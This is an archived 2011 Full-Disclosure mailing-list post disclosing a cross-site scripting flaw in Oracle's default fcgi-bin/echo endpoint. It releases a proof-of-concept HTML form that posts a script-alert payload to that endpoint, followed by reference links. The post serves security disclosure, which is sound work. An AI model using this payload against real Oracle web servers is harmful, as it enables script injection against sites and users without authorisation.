[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] XSS in Oracle default fcgi-bin/echo
- To: bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] XSS in Oracle default fcgi-bin/echo
- From: paul.szabo@xxxxxxxxxxxxx
- Date: Wed, 23 Mar 2011 11:59:11 +1100
Long ago, I wrote about an XSS vulnerability in Oracle fcgi-bin/echo :
http://lists.grok.org.uk/pipermail/full-disclosure/2010-October/076794.html
http://www.securityfocus.com/archive/1/514181
The issue may now be fixed in the latest versions of Oracle web servers:
http://www.integrigy.com/oracle-security-blog/archive/2010/10/10/fastcgi-fcgi-bin-echo
So I now release the PoC for this vulnerability:
<form action="http://server/fcgi-bin/echo" method=post
enctype="multipart/form-data">
<input type=text name=xss size=50 value="<script>alert('XSS')</script>"><br>
<input type=submit value="send">
</form>
The "traditional" form of a similar vulnerability
http://osvdb.org/700
is claimed to have been fixed long ago, maybe in
http://www.oracle.com/technetwork/topics/security/cpujan2007-101493.html
However that never was actually fixed by Oracle, but was fixed by
browsers that %-encode the query.
Another interesting reference:
http://www.thisisahmed.com/tia/ohs/ohshardening.html
Cheers,
Paul Szabo psz@xxxxxxxxxxxxxxxxx http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/